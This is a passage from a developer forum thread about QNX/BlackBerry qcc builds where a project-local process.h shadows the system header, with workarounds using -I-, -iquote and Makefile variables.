text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
Getting Started with Kubernetes | Kubernetes CNIs and CNI Plug-ins
By Xiheng, Senior Technical Expert at Alibaba Cloud
The network architecture is a complex component of Kubernetes. The Kubernetes network model poses requirements for specific network functions. The industry has developed many network solutions for specific environments and requirements. A container network interface (CNI) allows you to easily configure a container network when creating or destroying a container. This article describes how classic network plug-ins work and how to use CNI plug-ins.
What Is A CNI?
A CNI is a standard network implementation interface in Kubernetes. Kubelet calls different network plug-ins through CNIs to implement different network configuration methods. A series of CNIs are implemented by plug-ins such as Calico, Flannel, Terway, Weave Net, and Contiv.
How to Use CNIs in Kubernetes
Kubernetes determines which CNI to use based on the CNI configuration file.
The CNI usage instructions are as follows:
(1) Configure the CNI configuration file (/etc/cni/net.d/xxnet.conf) on each node, where xxnet.conf indicates the name of a network configuration file.
(2) Install the binary plug-in in the CNI configuration file.
(3) After a pod is created on a node, Kubelet runs the CNI plug-in installed in the previous two steps based on the CNI configuration file.
(4) This completes the pod network configuration.
The following figure shows the detailed process.
When a pod is created in a cluster, the API server writes the pod configuration to the cluster. Some control components (such as the scheduler) of the API server are scheduled to a specific node. After listening to the creation of this pod, Kubelet performs some creation actions locally. When a network is created, Kubelet reads the configuration file in the configuration directory. The configuration file declares the plug-in to use. Kubelet executes the binary file of the CNI plug-in. The CNI plug-in enters the pod’s network space to configure a pod network. After a pod network is configured, a pod is created by Kubelet and goes online.
The preceding process seems complicated and involves multiple steps, such as configuring the CNI configuration file and installing the binary plug-in.
However, many CNI plug-ins can be installed in one click and are easy to use. The following figure shows how to use the Flannel plug-in. Flannel automatically installs the configuration and binary file on each node by using a Deploying template of kubectl apply Flannel.
Then, all CNI plug-ins required by the cluster are installed.
Many CNI plug-ins provide a one-click installation script. You do not need to concern yourself with the internal configuration of Kubernetes or how the APIs are called.
Select an Appropriate CNI Plug-in
The community provides many CNI plug-ins, such as Calico, Flannel, and Terway. Before selecting an appropriate CNI plug-in in a production environment, let’s have a look at the different CNI implementation modes.
Select an implementation mode based on a specific scenario, and then select an appropriate CNI plug-in.
CNI plug-ins are divided into three implementation modes: Overlay, Routing, and Underlay.
- In Overlay mode, a container is independent of the host’s IP address range. During cross-host communication, tunnels are established between hosts and all packets in the container CIDR block are encapsulated as packets exchanged between hosts in the underlying physical network. This mode removes the dependency on the underlying network.
- In Routing mode, hosts and containers belong to different CIDR blocks. Cross-host communication is implemented through routing. No tunnels are established between different hosts for packet encapsulation. However, route interconnection partially depends on the underlying network. For example, a reachable route must exist from the underlying network to Layer 2.
- In Underlay mode, containers and hosts are located at the same network layer and share the same position. Network interconnection between containers depends on the underlying network. Therefore, this mode is highly dependent on the underlying capabilities.
Select an implementation mode based on your environment and needs. Then, select an appropriate CNI plug-in in this mode. How do we determine the implementation mode of each CNI plug-in available in the community? How do we select an appropriate CNI plug-in? These questions can be answered by considering the following aspects:
Environmental Restrictions
Different environments provide different underlying capabilities.
- A virtual environment, such as OpenStack, imposes many network restrictions. For example, machines cannot directly access each other through a Layer 2 protocol, only packets with Layer 3 features such as IP addresses are forwarded, and a host can only use specified IP addresses. For a restricted underlying network, you can only select plug-ins in Overlay mode, such as Flannel-VXLAN, Calico-IPIP, and Weave.
- A physical machine environment imposes few restrictions on the underlying network. For example, Layer 2 communication can be implemented within a switch. In such a cluster environment, you can select plug-ins in Underlay or Routing mode. In Underlay mode, you can insert multiple network interface controllers (NICs) directly into a physical machine, or virtualize hardware on NICs. In Routing mode, routes are established through a Linux routing protocol. This avoids the performance degradation caused by VXLAN encapsulation. In this environment, you can select plug-ins such as Calico-BGP, Flannel-HostGW, and Sriov.
- A public cloud environment is a type of virtual environment and places many restrictions on the underlying capabilities. However, each public cloud adapts containers for improved performance and may provide APIs to configure additional NICs or routing capabilities. If you run businesses on the public cloud, we recommend that you select the CNI plug-ins provided by a public cloud vendor for compatibility and optimal performance. For example, Alibaba Cloud provides the high-performance Terway plug-in.
After considering the environmental restrictions, you may have an idea of which plug-ins can be used and which ones cannot. Then, consider your functional requirements.
Functional Requirements
- First, consider security requirements.
Kubernetes supports NetworkPolicy, allowing you to configure rules to support policies such as whether to allow inter-pod access. Not every CNI plug-in supports NetworkPolicy declaration. If you require NetworkPolicy support, you can select Calico or Weave.
- Second, consider the need to interconnect resources within and outside a cluster.
Applications deployed on virtual machines (VMs) or physical machines cannot be migrated all at once to a containerized environment. Therefore, it is necessary to configure IP address interconnection between VMs or physical machines and containers by interconnecting them or deploying them at the same layer. You can select a plug-in in Underlay mode. For example, the Sriov plug-in allows pods and legacy VMs or physical machines to run at the same layer. You can also use the Calico-BGP plug-in. Though containers are in a different CIDR block from the legacy VMs or physical machines, you can use Calico-BGP to advertise BGP routes to original routers, allowing the interconnection of VMs and containers.
- Lastly, consider Kubernetes’ service discovery and load balancing capabilities.
Service discovery and load balancing are services of Kubernetes. Not all CNI plug-ins provide these two capabilities. For many plug-ins in Underlay mode, the NIC of a pod is the Underlay hardware or is virtualized and inserted into a container through hardware. Therefore, the NIC traffic cannot be routed to the namespace where the host is located. As a result, you cannot apply the rules that the kube-proxy configures on the host.
In this case, the plug-in cannot access the service discovery capabilities of Kubernetes. If you require service discovery and load balancing, select a plug-in in Underlay mode that supports these two capabilities.
Consideration of functional requirements will narrow your plug-in choices. If you still have three or four plug-ins to choose from, you can consider performance requirements.
Performance Requirements
Pod performance can be measured in terms of pod creation speed and pod network performance.
- Pod Creation Speed
For example, when you need to scale out 1,000 pods during a business peak, you can use a CNI plug-in to create and configure 1,000 network resources. You can select a plug-in in Overlay or Routing mode to create pods quickly. The plug-in implements virtualization on machines, so you only need to call kernel interfaces to create pods. If you select a plug-in in Underlay mode, you need to create underlying network resources, which slow down the pod creation process. Therefore, we recommend that you select a plug-in in Overlay or Routing mode when you need to quickly scale out pods or create many pods.
- Pod Network Performance
The network performance of pods is measured by metrics such as inter-pod network forwarding, network bandwidth, and pulse per second (PPS) latency. A plug-in in Overlay mode will provide lower performance than plug-ins in Underlay and Routing modes because the former implements virtualization on nodes and encapsulates packets. This encapsulation causes packet header loss and CPU consumption. Therefore, do not select a plug-in in Overlay mode if you require high network performance in scenarios such as machine learning and big data. We recommend that you select a CNI plug-in in Underlay or Routing mode.
You can select an appropriate network plug-in by considering the preceding three requirements.
How to Develop Your Own CNI Plug-in
The plug-ins provided by the community may not meet your specific requirements. For example, only the VXLAN plug-in in Overlay mode can be used in Alibaba Cloud. This plug-in provides relatively poor performance and cannot meet some business requirements of Alibaba Cloud. In response, Alibaba Cloud developed the Terway plug-in.
You can develop a CNI plug-in if none of the plug-ins in the community are suitable for your environment.
A CNI plug-in is implemented as follows:
(1) A binary CNI plug-in is used to configure the NIC and IP address of a pod. This is equivalent to connecting a network cable to the pod, which has an IP address and NIC.
(2) A daemon process is used to manage the network connections between pods. This step connects pods to the network and enables them to communicate with each other.
Connect a Network Cable to a Pod
A network cable can be connected to a pod as follows:
Prepare an NIC for the Pod
You can connect one end of a veth virtual NIC to the pod’s network space and the other end of the NIC to the host’s network space. In this way, the namespaces of the pod and host are connected.
Allocate an IP Address to the Pod
Ensure that the IP address allocated to the pod is unique in the cluster.
When creating a cluster, we specify a CIDR block for each pod and allocate a CIDR block based on each node. As shown on the right in the preceding figure, the 172.16 CIDR block is created. We allocate a CIDR block suffixed with /24 by node. This avoids conflicts between the IP addresses on nodes. Each pod is allocated an IP address from the CIDR block of a specific node in sequence. For example, pod 1 is allocated 172.16.0.1, and pod 2 is allocated 172.16.0.2. This ensures that each node is in a different CIDR block and allocates a unique IP address to each pod.
In this way, each pod has a unique IP address in the cluster.
Configure the IP Address and Route of the Pod
- Step 1: Configure the allocated IP address to the pod’s NIC.
- Step 2: Configure the route of the cluster’s CIDR block on the pod’s NIC so that traffic to this pod is routed to its NIC. Also, configure the CIDR block of the default route on this NIC so that traffic to the Internet is routed to this NIC.
- Step 3: Configure the route destined for the pod’s IP address on the host and direct the route to the veth1 virtual NIC at the peer end of the host. In this way, traffic can be routed from the pod to the host, and access traffic from the host to the pod’s IP address can be routed to the peer end of the pod’s NIC.
Connect the Pod to the Network
After connecting a network cable to the pod, you can allocate an IP address and route table to the pod. Next, you can enable communication between pods by configuring each pod’s IP address to be accessible in the cluster.
Pods can be interconnected in the CNI daemon process as follows:
- The daemon process that a CNI runs on each node learns the IP address of each pod in the cluster and information about the node where this pod is located. The daemon process listens to the Kubernetes API server to obtain each pod’s IP address and node information. Each daemon is notified when nodes and pods are created.
- Then, the daemon process configures network connection in two steps:
- (1) The daemon process creates a channel to each node of the cluster. This channel is an abstract concept and implemented by the Overlay tunnel, the Virtual Private Cloud (VPC) route table in Alibaba Cloud, or the BGP route in your own data center.
- (2) The IP addresses of all pods are associated with the created channel. Association here is also an abstract concept and implemented through Linux routing, a forwarding database (FDB) table, or an Open vSwitch (OVS) flow table. Through Linux routing, you can configure a route from an IP address to a specific node. An FDB table is used to configure a route from a pod’s IP address to the tunnel endpoint of a node through an Overlay network. A flow table provided by OVS is used to configure a route from a pod’s IP address to a node.
Summary
Let’s summarize what we have learned in this article.
(1) How to select an appropriate CNI plug-in when building a Kubernetes cluster in your environment.
(2) How to develop a CNI plug-in when the CNI plug-ins available in the community cannot meet your requirements.
|
https://alibaba-cloud.medium.com/getting-started-with-kubernetes-kubernetes-cnis-and-cni-plug-ins-10c33e44ac88
|
CC-MAIN-2022-33
|
refinedweb
| 2,381
| 55.34
|
Rene Engelhard schrieb am Thursday, den 09. September 2010: > On Wed, Sep 08, 2010 at 01:22:24PM -0700, Don Armstrong wrote: > > 1: It's certainly a bug in the backported package using debhelper > > improperly; it may also be an additional wishlist bug in debhelper. > > I disagree, the backported package uses debhelper correctly. Especially > if you don't use the backported debhelper, too, you just have to rely > on that debhelper would do it correctly. > > Or do you really want debian/rules checking which debhelper you use > and add postinst/postrm snippets then after it noticed that dh_desktop > in theory should add something (because this is lenny) but doesn't? > > The debhelper backport simply should have made debhelper working in lenny > by reverting the change. > > For that matter, I have this in debian/rules already: > > ifeq "$(LENNY_BACKPORT)" "y" > dh_desktop -s > endif > > Because dh_desktop is not needed anymore on sarge/sid but on lenny. > But lenny-backports' debhelper doesn't do anything here like the > version in sarge/sid (whereas lennys version does, and that's what is > the expected environment inside lenny) I'll fix that. Alex
|
https://lists.debian.org/debian-devel/2010/09/msg00201.html
|
CC-MAIN-2017-17
|
refinedweb
| 187
| 58.01
|
return to main index
This tutorial presents a relatively straight forward explanation of how the shortest
distance between a point and a line can be calculated. Readers who have searched the
internet for information on this topic know there is no shortage of confusing, and
often confused, "explanations" about point-to-line calculations.
Computer graphics typically deals with lines in 3D space as those defined by points
that provide the coordinates of the start and end of a line. This tutorial refers to such
lines as "line segments". The shortest distance between a point and a line segment may
be the length of the perpendicular connecting the point and the line or it may be
the distance from either the start or end of the line.
For example, point P in figure 1B is bounded by the two gray perpendicular
lines and as
such the shortest distance is the length of the perpendicular green line d2. The points in
figures 1A and 1C are outside their respective starting and ending perpendiculars and
consequently the shortest distance must be calculated from either the start or the end
of the line segment.
P
d2
Figure 1
The python procedure presented in listing 1 primarily depends on the use the vector dot
product to determine if the shortest
distance is d2, case B, or
d1
or d3 shown cases
A and C. The procedure pnt2line uses a few vector procs that
are implemented in,
vectors.py.
Figures 4 to 8 illustrate each calculation performed by pnt2line. Consider
the point and the line segment shown in figurs 2 and 3.
B
d1
d3
A
C
pnt2line
Line:
Line:
start (1, 0, 2) end (4.5, 0, 0.5)
Point:
pnt (2, 0, 0.5)
Figure 2
The Y coordinates of the line and point are zero and as such
both lie on the XZ plane.
Figure 3
Convert the line and point to vectors. The coordinates of the
vector representing the point are relative to the start of the
line.
line_vec = vector(start, end) # (3.5, 0, -1.5)
pnt_vec = vector(start, pnt) # (1, 0, -1.5)
Figure 4
Scale both vectors by the length of the line.
line_len = length(line_vec) # 3.808
line_unitvec = unit(line_vec) # (0.919, 0.0, -0.394)
pnt_vec_scaled = scale(pnt_vec, 1.0/line_len) # (0.263, 0.0, -0.393)
Figure 5
Calculate the dot product of the scaled vectors. The value corresponds
to the distance, shown in black, along the unit vector to the
perpendicular, shown in green.
t = dot(line_unitvec, pnt_vec_scaled) # 0.397
Figure 6
Clamp 't' to the range 0 to 1.
Scale the line vector by 't' to find the nearest location, shown in
green, to the
end of the point vector. Calculate the distance from the nearest
location to the end of the point vector.
if t < 0.0:
t = 0.0
elif t > 1.0:
t = 1.0
nearest = scale(line_vec, t) # (1.388, 0.0, -0.595)
dist = distance(nearest, pnt_vec) # 0.985
Figure 7
Translate the 'nearest' point relative to the start of the line.
This ensures its coordinates "match" those of the line.
nearest = add(nearest, start) # (2.388, 0.0, 1.405)
Figure 8
Listing 1 (distances.py)
from vectors import *
# Given a line with coordinates 'start' and 'end' and the
# coordinates of a point 'pnt' the proc returns the shortest
# distance from pnt to the line and the coordinates of the
# nearest point on the line.
#
# 1 Convert the line segment to a vector ('line_vec').
# 2 Create a vector connecting start to pnt ('pnt_vec').
# 3 Find the length of the line vector ('line_len').
# 4 Convert line_vec to a unit vector ('line_unitvec').
# 5 Scale pnt_vec by line_len ('pnt_vec_scaled').
# 6 Get the dot product of line_unitvec and pnt_vec_scaled ('t').
# 7 Ensure t is in the range 0 to 1.
# 8 Use t to get the nearest location on the line to the end
# of vector pnt_vec_scaled ('nearest').
# 9 Calculate the distance from nearest to pnt_vec_scaled.
# 10 Translate nearest back to the start/end line.
# Malcolm Kesson 16 Dec 2012
def pnt2line(pnt, start, end):
line_vec = vector(start, end)
pnt_vec = vector(start, pnt)
line_len = length(line_vec)
line_unitvec = unit(line_vec)
pnt_vec_scaled = scale(pnt_vec, 1.0/line_len)
t = dot(line_unitvec, pnt_vec_scaled)
if t < 0.0:
t = 0.0
elif t > 1.0:
t = 1.0
nearest = scale(line_vec, t)
dist = distance(nearest, pnt_vec)
nearest = add(nearest, start)
return (dist, nearest)
Figure 9 shows 150 points in random locations and their "connections" to
their nearest location on a line.
Figure 1
|
http://fundza.com/vectors/point2line/index.html
|
CC-MAIN-2021-49
|
refinedweb
| 756
| 67.45
|
:
#include <stdio.h>
int main() {
char *mytext;
mytext = "Help";
if (mytext == "Help") {
printf("This should raise a warning");
}
return 0;
}Trying to compile this very simple C program, which on first sight many would probably say this is correct, will result in this:
$ gcc test1.c -Wall
test1.c: In function ‘main’:
test1.c:6:14: warning: comparison with string literal results in unspecified behavior
So, even though we had such an easy program, line 6 seems to be an issue for us:
if (mytext == “Help”) { <stdio.h>
‘0?
Very useful! Thanks.
Hi
Excellent, look forward to more of these 🙂
Thank you; such a series will be a big help.
The wrong example could be
#include
int main() {
const char mytext[] = “Help”;
if (mytext == “Help”) {
printf(“This should raise a warning”);
}
return 0;
}
To avoid making Ulrich Drepper cry 😉 section 2.4.1
But sure, the series is good to have. And is badly needed for some esoteric topics as strict aliasing.
Note that strcmp is easily misused and will certainly lead to bugs . I suggest you define a macro like
#define streq(a,b) (strcmp((a),(b)) == 0)
..or an inline function,as macros are pretty evil 😉
Keep going!
Sure.. but: do we want to have our packager army introduce the most sophisticated and complex code into any upstream project?
The target audience for his series is mostly packagers. Some of them are coders, many are not, some would like to learn, some don’t care and give up.
It’s nice to point out nice nifty tricks. But honestly, I doubt we would achieve a lot of packagers taking care of the errors, if it goes too far.
Yeah years after this is still helpful 🙂
Thanks for the post.
|
http://dominique.leuenberger.net/blog/2011/03/how-to-fix-brp-and-rpmlint-warnings-today-expression-compares-a-char-pointer-with-a-string-literal/
|
CC-MAIN-2018-22
|
refinedweb
| 291
| 72.05
|
Back to index
#include "pluginapi.h"
Go to the source code of this file.
PDB document header version 2 bytes 0x0002 if data is compressed, 0x0001 if uncompressed spare 2 bytes purpose unknown (set to 0 on creation) length 4 bytes total length of text before compression records 2 bytes number of text records record_size 2 bytes maximum size of each record (usually 4096; see below) position 4 bytes currently viewed position in the document sizes 2*records bytes record size array 78 bytes total.
Definition at line 78 of file pdbim.h.
Returns the string with importer description.
Definition at line 10 of file csvim.cpp.
{ return QObject::tr("Comma Separated Value Files"); }
|
https://sourcecodebrowser.com/scribus-ng/1.3.4.dfsgplus-psvn20071115/pdbim_8h.html
|
CC-MAIN-2017-51
|
refinedweb
| 114
| 64.3
|
51678/primary-keys-in-apache-spark
from pyspark.sql.functions import monotonically_increasing_id
df.withColumn("id", monotonically_increasing_id()).show()
Verify the second argument of
df.withColumn is monotonically_increasing_id() not monotonically_increasing_id.
Try this:
val text = sc.wholeTextFiles("student/*")
text.collect() ...READ MORE
Go to your Spark Web UI & ...READ MORE
Use Parquet. I'm not sure about CSV ...READ MORE
You need to sort RDD and take ...READ MORE
I found the following solution to be ...READ MORE
Hi,
I have the input RDD as a ...READ MORE
The official definition of Apache Hadoop given ...READ MORE
For accessing Hadoop commands & HDFS, you ...READ MORE
Though Spark and Hadoop were the frameworks designed ...READ MORE
Spark and Hadoop both are the open-source ...READ MORE
OR
At least 1 upper-case and 1 lower-case letter
Minimum 8 characters and Maximum 50 characters
Already have an account? Sign in.
|
https://www.edureka.co/community/51678/primary-keys-in-apache-spark?show=51686
|
CC-MAIN-2022-27
|
refinedweb
| 146
| 54.9
|
Holy cow, I wrote a book!
A customer observed that when their service logs multiple
events in rapid succession,
they sometimes show up out of order in Event Viewer.
Specifically, the order of events that all occur within the
same second are sometimes mis-ordered relative to each other.
Is this expected?
Events in the event viewer are
timestamped only to one-second resolution.
The
EVENTLOGRECORD structure
reports time in UNIX format,
namely,
seconds since January 1, 1970.
EVENTLOGRECORD
Experimentation suggested that the Event Viewer sorts
events by timestamp, but it does not use a stable sort,
so multiple events that occur within the same second
end up in an unpredictable order.
Not much you can do about it,
but at least now you know that you're not hallucinating.
By default, the Windows 8 touch keyboard does not appear automatically
when focus is placed on an edit control in a desktop program.
To change the behavior for your program, just use
this one weird trick:
HRESULT EnableTouchKeyboardFocusTracking()
{
ComPtr<IInputPanelConfiguration> configuration;
HRESULT hr =
CoCreateInstance(__uuidof(InputPanelConfiguration), nullptr,
CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&configuration));
if (SUCCEEDED(hr)) {
hr = configuration->EnableFocusTracking();
}
return hr;
}
You create an instance of the
InputPanelConfiguration object
and ask it to enable focus tracking.
This is a per-process setting, and once set,
it cannot be unset.
InputPanelConfiguration
Let's use this function in a Little Program so you can
play with it.
Most of the work in setting up the program is creating
two controls: an edit control and a button.
If I had just one control,
then you wouldn't be able to see how the keyboard automatically
appears and disappears when focus moves between an edit
control and some other type of control.
Remember that Little Programs do little to no error checking.
Start with
the scratch program and make these changes:
#define STRICT
#include ...
#include <shobjidl.h>
#include <inputpanelconfiguration.h>
#include <wrl\client.h>
#include <wrl\event.h>
using namespace Microsoft::WRL;
HINSTANCE g_hinst; /* This application's HINSTANCE */
HWND g_hwndChild; /* Optional child window */
HWND g_hwndButton;
HWND g_hwndLastFocus;
void
DoLayout(HWND hwnd, int cx, int cy)
{
if (g_hwndChild) {
MoveWindow(g_hwndChild, 0, 0, cx - 100, cy, TRUE);
}
if (g_hwndButton) {
MoveWindow(g_hwndButton, cx - 100, 0, 100, 50, TRUE);
}
}
void
OnSize(HWND hwnd, UINT state, int cx, int cy)
{
DoLayout(hwnd, cx, cy);
}
BOOL
OnCreate(HWND hwnd, LPCREATESTRUCT lpcs)
{
g_hwndChild = CreateWindow(TEXT("edit"), nullptr,
WS_CHILD | WS_VISIBLE | WS_BORDER | ES_MULTILINE,
0, 0, 100, 100, hwnd, nullptr, g_hinst, 0);
g_hwndButton = CreateWindow(TEXT("button"), TEXT("Send"),
WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,
0, 0, 100, 100, hwnd, nullptr, g_hinst, 0);
EnableTouchKeyboardFocusTracking();
return TRUE;
}
// OnActivate incorporated by reference.
HANDLE_MSG(hwnd, WM_ACTIVATE, OnActivate);
BOOL
InitApp(void)
{
...
wc.hbrBackground = (HBRUSH)(COLOR_APPWORKSPACE + 1);
...
}
We position the edit control on the left hand side of the window
and put the button in the upper right corner.
We enable focus tracking on the touch keyboard,
and just to make it easier to see where the edit control is,
we give the frame with the app-workspace color.
Although we summon the touch keyboard when focus enters
the edit control,
we do nothing to prevent the keyboard from covering what the
user is typing.
This is one of the reasons that the touch keyboard does not
appear automatically when focus is placed in an edit control
of a desktop program.
It would end up covering the edit control the user is trying to type into!
We'll work on fixing this problem next week.
A customer asked,
"Under what conditions can SetFocus crash?"
SetFocus)?
The full dump file can be found on <location>.
The password is <xyzzy>.)?
DismissPopup
GetActiveWindow
The full dump file can be found on <location>.
The password is <xyzzy>.
Indeed, what the customer suspected is what happened,
confirmed by the dump file provided.
The code behind the window procedure got unloaded.
UserCallWinProcCheckWow
is trying to call the window procedure, but instead it took an exception.
The address doesn't match any loaded or recently-unloaded
module probably because it was a dynamically generated
thunk,
like the ones ATL generates.
UserCallWinProcCheckWow
There isn't much you can do to defend against this.
Even if you manage to detect the problem and avoid calling
SetFocus in this problematic case,
all you're doing is kicking the can further down the road.
Your program will crash the next time the window
receives a message, which it eventually will.
(For example, the next time the user changes a system
setting and the WM_SETTINGCHANGE
message is broadcast to all top-level windows,
or the user plugs in an external monitor and the
WM_DISPLAYCHANGE message is
broadcast to all top-level windows.)
WM_SETTINGCHANGE
WM_DISPLAYCHANGE
Basically, that other component pulled the pin on
a grenade and handed it to your thread.
That grenade is going to explode sooner or later.
The only question is when.
Such is the danger of
giving your application an extension model that
allows arbitrary third party code to run.
The third party code can do good things
to make your program more useful,
but it can also do bad things to make
your program crash..
I am not a selection reader, but I do click in the
document with some regularity. I do this for two reasons..
A security report was received that went something like this:
The XYZ application does not load its DLLs securely.
Create a directory, say, C:\Vulnerable,
and copy
XYZ.EXE and a rogue
copy of ABC.DLL in that directory.
When C:\Vulnerable\XYZ.EXE is run,
the XYZ program will load the rogue DLL instead of the
official copy in the System32 directory.
This is a security flaw in the XYZ program.
C:\Vulnerable
XYZ.EXE
ABC.DLL
C:\Vulnerable\XYZ.EXE
Recall that
the directory is the application bundle,
The fact that the XYZ.EXE program loads ABC.DLL from the
application directory rather than the System32 directory
is not surprising
because the ABC.DLL has been placed inside the XYZ.EXE program's
trusted circle.
But what is the security flaw, exactly?
Let's identify
the attacker,
the victim,
and the attack scenario.
The attacker is
the person who created the directory with the copy of
XYZ.EXE and the rogue ABC.DLL.
The victim is whatever poor sap runs the XYZ.EXE
program from the custom directory instead of from
its normal location.
The attack scenario is
copy C:\Windows\System32\XYZ.EXE C:\Vulnerable\XYZ.EXE
copy rogue.dll C:\Vulnerable\ABC.DLL
When the victim runs
C:\Vulnerable\XYZ.EXE,
the rogue DLL gets loaded,
and the victim is pwned.
But the victim was already pwned even before getting
to that point!
Because the victim ran
C:\Vulnerable\XYZ.EXE.
A much simpler attack is to do this:
copy pwned.exe C:\Vulnerable\XYZ.EXE
The rogue ABC.DLL is immaterial.
All it does is
crank up the degree of difficulty
without changing the fundamental issue:
If you can trick a user into running a program you control,
then the user is pwned.
Note that the real copy of XYZ.EXE in the System32
directory is unaffected.
The attack doesn't affect
users which run the real copy.
And since
C:\Vulnerable isn't on the default PATH,
the only way to get somebody to run the rogue copy is to
trick them into running the wrong copy.
PATH
It's like saying that there's a security flaw in Anna Kournikova
because people can create things that look like Anna Kournikova
and trick victims into running it..
__ENABLE_EXPERIMENTAL_TADPOLE_OPERATORS
Start with the identity for two's complement negation
-x = ~x + 1
then move the -x to the right hand side
and the ~x to the left hand side:
-x
~x
-~x = x + 1
If that was too fast for you,
we can do it a different way:
start with the identity for two's complement negation
subtract 1 from both sides
-x - 1 = ~x
and finally, negate both sides
x + 1 = -~x
To get the decrement tadpole operator, start with
and
substitute x = -y:
x = -y
-(-y) = ~-y + 1
subtract 1
from both sides and simplify -(-y) to y.
1
-(-y)
y
y - 1 = ~-y
Update:
Justin Olbrantz (Quantam)
and
Ben Voigt provide
a simpler derivation,
starting with the identity for two's complement negation.
-x = ~x + 1
~x = -x - 1
x = ~y
-~y = ~(~y) + 1
~-y = -(-y) - 1
-~y = y + 1
~-y = y -)..
As I was heading home at the end of the day,
I ran into one of my colleagues who was also going home,
and he was carrying a Star Wars-themed metal lunchbox
similar to
this one.
For those who didn't grow up in the United States,
these metal lunchboxes are the type of things elementary
school children use to carry their lunch to school.
I remarked,
"Nice lunchbox."
My colleague explained,
"Yeah, I sort of ended up as the lunchbox guy.
It started when somebody gave me a lunchbox as a
semi-humorous gift,
and I kept it on my shelf.
Then other people saw that I had a metal lunchbox
and concluded,
'Oh, he must collect metal lunchboxes,'
and they started giving me metal lunchboxes.
And before I knew it,
I became an unwitting collector of metal lunchboxes."
The same thing happened to a different colleague of mine.
As his first birthday after he got married approached,
his new in-laws asked his wife,
"What does Bob like?"
His wife shrugged.
"I dunno.
He kind of likes Coca-Cola?"
That year, he got a vintage Coca-Cola serving tray.
The next year, he got a Coca-Cola clock.
And then Coca-Cola drinking glasses.
And so on.
Eventually, he had to
ask his wife to tell her family,
"Okay, you can stop now.
Bob doesn't like Coca-Cola that much."
|
https://blogs.msdn.com/b/oldnewthing/default.aspx?Redirected=true&PageIndex=3
|
CC-MAIN-2015-27
|
refinedweb
| 1,626
| 56.05
|
Welcome to java tutorial series. In this lesson, you will learn to create your first Java program.
In Java, all source code is written in plain text file which is saved as .java file. The Java compiler is use to compile the source code (.java file) into binary file with .class extension. On the command prompt the javac command is used to invoke the Java compiler. This .class file does not contain code that is native to your processor; instead it contains a byte code that is converted into machine specific binary code by the Java Virtual Machine.
You can write a Hello World program as your first Java program. To write the Hello world program you need simple text editor like note pad and make sure the JDK is already installed on your machine for compiling and running that program.
Here is the complete video tutorial.
Write the following code, given on the screen, on your note pad to and save as HelloWorld.java file.
Here is the complete code of the HelloWorld.java program.
public class HelloWorld { public static void main(String[] args){ System.out.println("Hello World!"); } }
You can save the above file in java file e.g. HelloWorld.java in any drive of your hard disk.
Save the file and remember the location where you save your file. In this example we have saved the file in the C:\javatutorial\example directory. Save the file with .java extension. e.g. HelloWorld.java.
Using javac, you can compile the Java source code into byte code and using java command, you can interpret and run the program as shown on your screen.
After compiling the program it generates the .class file. In our case HelloWorld.class will be generated. You can execute the file using java HelloWorld command.
You should open the command prompt and go to the directory where java is saved. To compile use the java HelloWorld.java command and to execute the program use java HelloWorld command.
Go to the Java video tutorial index page for more video tutorials. Java Program
Post your Comment
|
http://www.roseindia.net/java/training/first-java-program-video.shtml
|
CC-MAIN-2015-32
|
refinedweb
| 349
| 67.76
|
I need help with a C++ problem
π= 4(1/1- 1/3+ 1/5- 1/7+ 1/9- 1/11+ … 〖(-1)^n /(2n+1)+ …)
How many terms of series (1) you need to use before you get the approximation p of π, where:
a) p = 3.0 b) p = 3.1 c) p = 3.14 d) p = 3.141 e) p = 3.1415 f) p = 3.14159
I need to use the do-while loop or maybe the for loop. Please help me.
This is what i was trying to do but is not right..
#include <iostream> using namespace std; int main() { double c; double i, a=-1, b; double s=0, p; cout << "Please enter a value for p." << endl; cin >> p; do { c=4; a= -a; b= 2*i+1; s+= c*(a/b); i++; } while (s<p+0.05 && s>p-0.05); // i think the condition is wrong. cout << "The value of i is: " << i << endl; return 0; }
|
https://www.daniweb.com/programming/software-development/threads/321756/c-determine-value-of
|
CC-MAIN-2018-30
|
refinedweb
| 163
| 103.32
|
This is your resource to discuss support topics with your peers, and learn from each other.
06-19-2012 12:24 PM
Played a bit more.
I added the directory C:/projects/temp with file process.h containing:
#error "Oops, opened wrong include process.h"
Added -IC:/projects/temp to the build, and it failed with that error.
I wasn't able to get -iquote working so I used -I-
I'm using a managed build, so edited my include path in momentics from the project's properties, QCC Compiler, preprocessor. I added Extra Options -I- and moved the preprocessor -I include directory for Qt into here as well so that it is after the -I.
This gives build line:
qcc -o src\main.o ..\src\main.cpp -V4.4.2,gcc_ntox86_cpp -w1 -IC:/blackberry/bbndk-2.0.1/target/qnx6/usr/includ
cc1plus: note: obsolete option -I- used, please use -iquote instead
(Obviously -iquote is supported, so I'll leave getting that working as an exercise
)
This built for me.
So.... if you want to have a #include "aSystemFile.h" mean something different from #include <aSystemFile.h> you can.
That doesn't really get to the issue that subsystems should be able to rely on opening files within their own subsystem without fear of a file being totally overridden in a project. I had thought that the preprocessor looks first in the directory of the including file. (Boost does this by having #include <boost/...> ) Still checking into that, so if anyone knows, please let us know.
Stuart
06-19-2012 12:51 PM
Well, the issue isn't with boost anymore, but with standard header usr/include/unistd.h (included by most Boost libraries), which contains the following line:
#include <process.h>
... where <process.h> is meant to refer to a (non-ANSI, non-POSIX, QNX-specific) file also in usr/include.
However, if any of your project directories happen to contain a file called process.h (or Process.h on case-insensitive filesystems) then it will override the one in usr/include, most likely causing a compile error.
You can use -iquote to keep the paths from being on the angle-bracket search path, but QCC doesn't support -iquote, so you need to pass it directly to GCC in the CCFLAGS parameter as follows:
-Wc,"-iquote\"path\""
In my project I now have a variable listing all of my project's subdirectories (could be replaced by a shell-find if I wanted it automated), followed by these lines:
comma := ,
ENGINE_ROOT = $(current_dir)/Engine
ENGINE_PATHS = $(foreach dir,$(ENGINE_DIRS),$(ENGINE_ROOT)/$(dir))
ENGINE_INCLUDES = $(foreach path,$(ENGINE_PATHS),-Wc$(comma)"-iquote\"$(path)\
Then I add $(ENGINE_INCLUDES) to the lines for CCFLAGS.
This works, however, if you have code to compile in those directories you've got extra work to do, because if you just add those directories to EXTRA_SRCVPATH then the build system will do you the favour of adding those directories back to EXTRA_INCVPATH, thereby nullifying all the work you just did.
So you need to manually add all your source files from your directories:
ENGINE_SRCS = $(foreach path,$(ENGINE_PATHS),$(wildcard $(path)/*.cpp))
SRCS += $(ENGINE_SRCS)
